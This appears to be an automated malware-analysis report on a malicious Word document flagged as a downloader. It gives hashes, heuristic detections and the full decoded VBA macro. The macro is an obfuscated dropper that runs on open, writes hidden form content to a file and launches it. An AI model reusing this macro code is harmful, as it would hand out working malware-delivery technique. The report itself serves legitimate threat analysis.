Office (OOXML) malware analysis — malicious · f3cf2ebf56a81a8a

MALICIOUS

Office (OOXML)

78.8 KB Created: 2021-02-04 08:59:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-23

MD5: 5790ec844d2e668984fb07cf24b917ed SHA-1: 0a7e74ae58f383f6b96e0080043d5cf4820cebc9 SHA-256: f3cf2ebf56a81a8afd2d86fabbf4087a544d349b7f4a4dd37ae304ff47920c88

192 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell "C:\Windows\explorer.exe " & a9irm
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set aN6sm = CreateObject("Scripting.FileSystemObject")
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	4319 bytes
SHA-256: `795954f090533ca8264b27269daf69fa022abc0a85b7afcefe4e3828bce8b936`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "myf" Attribute VB_Base = "0{16763085-3C93-463D-99D8-B145700BF18A}{59C4E7BB-A9FB-4DB2-91DD-B3F2B23E1220}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "ab5EJy" Function aX4Z7(aqtJF) aCQRBn = "1234" ' Marl broad networks ' Authorized serum begin ' Cede cardiff ' Prescription anal nascent ' Colourless lire record ' Exemplify indus tuning If anrimp <> 16 Then aX4Z7 = VBA.Split(aqtJF, aCQRBn) End If End Function Sub AutoOpen() ' Bi ' Jumps failures parliament snore apm7I End Sub Attribute VB_Name = "axNK7" Function aMy3ZT() ' Broadband cobra ' Archives retirement almighty hoary walloon ' Additionally authorities ' Dualism generic mass ' Occupant processor ' Appropriations tureen liz portraits aMy3ZT = myf.text1.value End Function Function a7dwK(aioslg) Dim ahRYZ As String Dim ach8Cs As String Dim aT82Rg As Long Dim al9Ogj As Integer aT82Rg = Len(aioslg) ahRYZ = "" For al9Ogj = aT82Rg To 1 Step -1 ach8Cs = Mid(aioslg, al9Ogj, 1) ahRYZ = ahRYZ & ach8Cs Next al9Ogj a7dwK = ahRYZ End Function Function aCYFm2(arcMGL) ' Bermuda If arcMGL <> 16 Then aCYFm2 = Chr("" & arcMGL & "") End If End Function Sub ajCHn(asm2e, aaUGt) ' Brawny betty minolta ' Script opprobrium ' Usr henry store purchasing Set aN6sm = CreateObject("Scripting.FileSystemObject") ' Antonio hotels stoic ' Sexton ' Omniscient corolla papal hera sheets pissing ' Withers vans alexandra shorts Set aAC7R = aN6sm.CreateTextFile(asm2e) aAC7R.WriteLine aaUGt aAC7R.Close ' Couplet loading darrell ' Card staffs ' Montreal determines minolta sparse ' Delivers assuming critics pickaxe adventuress powell ' Seventy-four ' Impressive boots dormant ' Wrongdoing students inclusive varuna ' Bufing removed nba myself digestive ' Waxing medicinal prostores pelf ' Dais delete ' Differentiation adventitious voluptuous dollar ' Sie handling redolent ' Cult police discontinued nor sky alternatively animal ' Crew ' Exodus over- irrigation adobe End Sub Attribute VB_Name = "aLl92v" Public Const aD9Sx As String = "1171234104123496123412412341271234981234117123498" Public Const ayCma As String = "11512344212347612349612349812341271234119123498123411312341251234116123411312341001234113123476123411312348112341181234911234691234123123462123412012341001234113" Function a8XwtN(aarbZ5, aihuL) ' Carbolic robust bitch ' Happen harpoon edit queue ' Protecting clinic ' Cuckold cinderella divulge ' Deranged lands If Len(aarbZ5) <> 4 Then a8XwtN = Trim("" & aarbZ5 Xor aihuL) End If End Function Function alchms(ap2Oc As Variant) Dim a7aok As String a7aok = "" For aL1nq0 = 0 To UBound(ap2Oc) aU40MK = aCYFm2(a8XwtN(ap2Oc(aL1nq0), 16)) a7aok = a7aok & aU40MK Next aL1nq0 alchms = a7aok End Function Sub apm7I() ' Championships ' Fickleness ' Initially adapter ' Bikini reproduce ' Incongruous consequence observant caper fornication ' Dresses accent defensible fie evaporate spice ' Churches hat temperature vibrate cuckold avL3oi = aMy3ZT() ' Humans chapman ' Referenced ' Adores plants instructional sell ' Intend substitution backbone porous knows ' Doggedly drug forage prodigy ' Jaunt present-day formal exponent ' Hs had mammals respectively sand beck flip a9irm = alchms(aX4Z7(ayCma)) ' Interstate ' Respiratory Call ajCHn(a9irm, a7dwK(avL3oi)) ' Dike bacchus heinous max ' Regenerate dancer partner arg ' Ashen vociferous insomnia ' Skepticism muslim mutual oils ' Dazzle athletes pico ' Impacts concentrations short-lived practical subversion Shell "C:\Windows\explorer.exe " & a9irm ' Pharmacies amaryllis municipal ' Indigent newport ' Crags ' Cog decide killing jesse rock ' Ruby uh ' Wait stomach perth ' Larch training coop internship ' Quantum prune taiwan ' Expenses retaliation ' Immobile heterodox xhtml End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	31744 bytes
SHA-256: `a1a87adff8ae7dfefde089b4856850cd34f8f9e70286292193935e0f9daf05f5`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.